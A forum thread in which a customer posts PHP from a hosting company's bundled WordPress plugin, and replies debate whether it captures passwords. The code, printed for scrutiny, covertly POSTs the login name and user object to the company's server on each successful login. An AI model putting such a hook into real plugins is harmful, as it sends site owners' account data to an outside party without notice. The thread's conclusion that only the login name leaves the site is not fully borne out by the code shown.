Please Confirm that this WordPress Code Captures Login Names and Passwords

16 replies
I had a "free" site delivered by BrainHost.com as part of signing up for hosting with them. No documentation was provided on the "free" site but it had a "BrainHost Website Configuration" plugin. This plugin controlled ad configuration but I also found the following code. Unless I am missing something BrainHost is capturing WordPress logins and passwords.

Anyone willing to confirm that this is in fact what the following snippets do? I find this extremely unethical and totally unacceptable from a hosting company. Do you agree?

Code:
#############################################
add_action('wp_login', 'bh_track_successful_login');
function bh_track_successful_login($user_login, $user)
{

    $params = array(
        'domain'     => $_SERVER['HTTP_HOST'],
        'user_login' => $user_login,
        'user'       => $user
    );

    $resp = _curl_post('http://setup.brainhost.com/track_login', $params);

    return;

}
function _curl_post($url=false,$post=array())
{
    // error handling
    if ( ! $url)
        return;

    // generate query string from post_data
    $query_string = http_build_query($post);
    
    // initialize curl
    $ch = curl_init();
    
    // set parameters
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $query_string);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    // run cUrl
    $response = curl_exec ($ch);

    // return the response
    return $response;
}
  • RobinInTexas
    Was that a free site provided by a third party as an upsell from another purchase?

    It appears to report the post data back to brainhost, but what is the purpose of the configuration plugin?
    • pianoman959
      The plugin was provided by BrainHost via My Creative Site Designs (which is now part of BrainHost). The website development and completion notices all came through BrainHost.com addresses. The plugin does serve another purpose in that it creates a configuration page where one enters HTML for up to 3 ads. This ties into widgets and themes enabled to display those ads. It does make ad management easier.

      My concern is that they are capturing sensitive information without any notice to clients and that the capture code has nothing to do with the features of the plugin from what I can tell.
  • Andrew H
    1. Why the hell are you using some random host like 'brainhost'
    2. Why don't you contact their support and ask about this?
    • pianoman959
      I have another hosting company. I only tried out BrainHost because of a super affiliate's recommendation and the "free" web site. I did ask support "how" they got my password twice and got no response. I have cancelled my account and it appears I will get a full refund based upon e-mails.

      This post is really a warning to others who might consider BrainHost based upon their incentives.
  • RobinInTexas
    How much are they charging you for hosting and domain registration?

    This sounds like a way overpriced upsell from a get rich quick promotion I passed up.
    • pianoman959
      The hosting was recommended on one of the larger affiliate membership sites, not a get quick rich promotion. I have opened tickets identifying a problem on the membership site.
  • neversay
    I found that they capture only the login name, not the password.
  • Scotty Bee
    Why would Brainhost want login details unless they were up to no good?

    Hostgator asks us for logins on their support desk even though they could probably access it on their servers, but it probably confirms your ID for security.

    Sounds a bit sus to me.
    Scotty
  • SteveJohnson
    Unless I am missing something BrainHost is capturing WordPress logins and passwords.
    You're missing quite a bit. The plain-text password that a user enters is never exposed to the core in a way that would allow its capture by an action or filter. They're only tracking successful logins. I say *only* because that's all they're doing - whether or not they SHOULD be doing it is a different question altogether.
    • pianoman959
      Thanks Steve, WordPress documentation was a little misleading but I was able to confirm that only the login name was being captured. What set me up in arms initially was BrainHost providing me my admin password via an e-mail that did not come from WordPress. This was not the initial password but one to which I had changed. I thought maybe they grabbed it through this plugin.
      • FirstSocialApps
        Originally Posted by pianoman959

        e to which I had changed. I thought maybe they grabbed it through this plugin.
        As I said, they could grab your password and anything else from the database that is on their box. Why are you so upset? Or is this just a thread to bash a company?
        • pianoman959
          FirstSocialApps, I spent over 30 years in IT. Yes admins can grab that information. The question is whether they should and the ethics associated with doing so. Improper access of passwords is grounds for termination by most companies. In addition, if the WordPress wp-config file encrypted passwords like the DB encrypts passwords it would be much more difficult for admins to grab the information. Yes I do change the permissions on the wp-config file to make it a little more difficult for admins to read that information.

          Why do I get upset over admins accessing sensitive information without informing clients? A number of years ago I purchased a plugin that had a backdoor that allowed a criminal ring to setup a phishing site underneath one of my domains. I dealt with an incredible amount of paperwork with both banks and my hosting company at the time (both of which were very understanding). This makes me a little more sensitive to plugins that capture information and send it to another URL.

          The fact is that information is being grabbed by BrainHost without notification that it is being done so. This information is being sent outside the hosted domain. This simply should never be done without full and adequate disclosure including justification of the need to do so.

          I have current hosting accounts with HostGator, 1and1, RackSpace, with both shared and dedicated servers. I have no problem changing root or other passwords to give to them when asked and then changing them again when they are done with investigative processes. In my book, it is completely unacceptable for an admin to just go out and grab this information without client notification. Not only does this expose the client to risk, it exposes the hosting company to risk if a "bad" employee misuses the information. If a site is hijacked by criminal sources, there needs to be an audit trail and clear cut policies in place regarding access of sensitive information.

          Regarding bashing, do I like BrainHost as a hosting company? Absolutely not, which is why I terminated my account, but not for this alone. In my opinion, should BrainHost be bashed for installing a plugin that captures and sends information outside a client's domain without informing the client? Definitely.

          Do I take responsibility in that I didn't fully understand the WordPress documentation on the functions related to login information and was concerned that the password was being sent as well? Yes, but that is why I raised the question in the first place. I do code plugins but primarily code in other languages developing backends.

          As a final comment, assume your payment processor information is stored on your server. Do you really want an admin being able to access that information? The issue comes down to one of trust and procedure. If you don't trust your hosting provider, it's time to leave. I have done so and will say no more.
        • SteveJohnson
          Originally Posted by FirstSocialApps

          As I said, they could grab your password and anything else from the database that is on their box. Why are you so upset? Or is this just a thread to bash a company?
          No, they can't "grab your password". Passwords in WP are not stored as clear text. They could get the stored encrypted password, but why bother?
    • Karen Blundell
      Originally Posted by SteveJohnson

      You're missing quite a bit. The plain-text password that a user enters is never exposed to the core in a way that would allow its capture by an action or filter. They're only tracking successful logins. I say *only* because that's all they're doing - whether or not they SHOULD be doing it is a different question altogether.
      To add to this, and speculating why they would do this: perhaps it's to monitor the load that WordPress puts on a server when a user is logged into a WordPress back-end and performing tasks. WordPress uses a lot of CPU resources, especially if one tends to use a lot of plugins.

      I monitored WordPress resource usage for several months on one of my sites. I noticed at times the CPU usage would spike to 100% - and that was when I decided to look more closely at visitor logs and discovered I was under attack. Multiple brute force attempts on the wp-login.php file. I have since dumped WordPress for that site. WordPress is a great CMS - but it is subject to too many hacks because it is now used by too many unscrupulous people.

      I am not surprised at all by any host monitoring WordPress usage - but that script would make me nervous too. I think that, at any time when you have concerns and you're a paying customer, you are well within your rights to question policies of the company you are dealing with, but just because you question, you shouldn't expect them to adhere to your wishes. You then have the option of taking your business elsewhere.
      • BFriendly
        Originally Posted by Karen Blundell

        I noticed at times the CPU usage would spike to 100% - and that was when I decided to look more closely at visitor logs and discovered I was under attack. Multiple brute force attempts on the wp-login.php file.
        So it's possible that BrainHost is maintaining a database of all the login names for the purpose of detecting a distributed attack across all the sites that it is hosting.

        What if (hypothetically) it sees an attempt at using the same login name twice on two different sites, owned by two different clients? Coincidence? How many times would a specific login name be attempted on non-connected sites before it was certain that it was an attack? 3? 5? (I say twice on a reasonably long & unique login name.)

        Also, comparing login names to a dictionary of commonly used passwords. How many times does the same IP need to attempt to use "dictionary" login names before the hosting service can reasonably conclude that it is a hack attempt and ban the IP? Again, I say twice. Same IP attempts to access two unrelated sites using the login name "poop1234" and if I ran the web hosting company, I'd issue an immediate ban on the IP.

        It's probably much more complex than this, with sophisticated hackers doing a distributed attack against multiple sites using multiple IP Addresses, and a simple database of attempted login names may not by itself be of much value, but it would be one component. And another thing to consider is that database may be shared with other webhost providers in a cooperative effort to safeguard all of their sites by pooling their data, similar to how the anti-malware companies, and anti-spam entities do.
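The cross-site correlation BFriendly sketches, written out as an added example; it is not code from the thread or from BrainHost. It assumes a host-side collector that records failed as well as successful attempts (the wp_login hook in the snippet at the top fires only on success, so a host would also need WordPress's wp_login_failed action to see failures), and the events and the small login-name dictionary are constructed for the demo.

```python
from collections import defaultdict

# Constructed dictionary of login names attackers commonly guess; only
# "poop1234" comes from the thread, the rest is an assumption for the demo.
DICTIONARY_LOGINS = {"admin", "administrator", "test", "root", "poop1234"}

# Constructed sample of what a host-side collector might receive from many
# unrelated customer sites: (domain, user_login, source_ip, success).
EVENTS = [
    ("alice-bakery.example", "alice", "203.0.113.5", True),
    ("bob-garage.example", "bob", "198.51.100.7", True),
    ("alice-bakery.example", "poop1234", "192.0.2.9", False),
    ("bob-garage.example", "poop1234", "192.0.2.9", False),
    ("carol-photos.example", "admin", "192.0.2.9", False),
    ("carol-photos.example", "xq7-lumen-42", "198.51.100.30", False),
    ("dave-blog.example", "xq7-lumen-42", "198.51.100.31", False),
    ("dave-blog.example", "dave", "198.51.100.31", False),
]


def correlate(events, ip_threshold=2, name_threshold=2):
    """Return (ips_to_ban, suspicious_names).

    ips_to_ban: source IPs that tried dictionary login names against at
        least ip_threshold unrelated domains (BFriendly's "ban after two").
    suspicious_names: non-dictionary login names that failed on at least
        name_threshold unrelated domains, the signature of a distributed
        attack spread over many source addresses.
    """
    dict_domains_by_ip = defaultdict(set)
    domains_by_name = defaultdict(set)
    for domain, login, ip, success in events:
        if success:
            continue  # successful logins carry no brute-force signal here
        if login in DICTIONARY_LOGINS:
            dict_domains_by_ip[ip].add(domain)
        else:
            domains_by_name[login].add(domain)
    ips_to_ban = {ip for ip, d in dict_domains_by_ip.items()
                  if len(d) >= ip_threshold}
    suspicious_names = {n for n, d in domains_by_name.items()
                        if len(d) >= name_threshold}
    return ips_to_ban, suspicious_names


if __name__ == "__main__":
    print(correlate(EVENTS))  # ({'192.0.2.9'}, {'xq7-lumen-42'})
```

On the constructed events, the one address cycling "poop1234" and "admin" across three customers is banned, and the unusual name that fails on two unrelated sites from two different addresses is surfaced for review rather than auto-banned.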
  • FirstSocialApps
    Why would you care if your host tracks your logins? The database is on their server. If they wanted them they could just pull it from the server. Unless you run your own box you're totally exposed to your hosting company.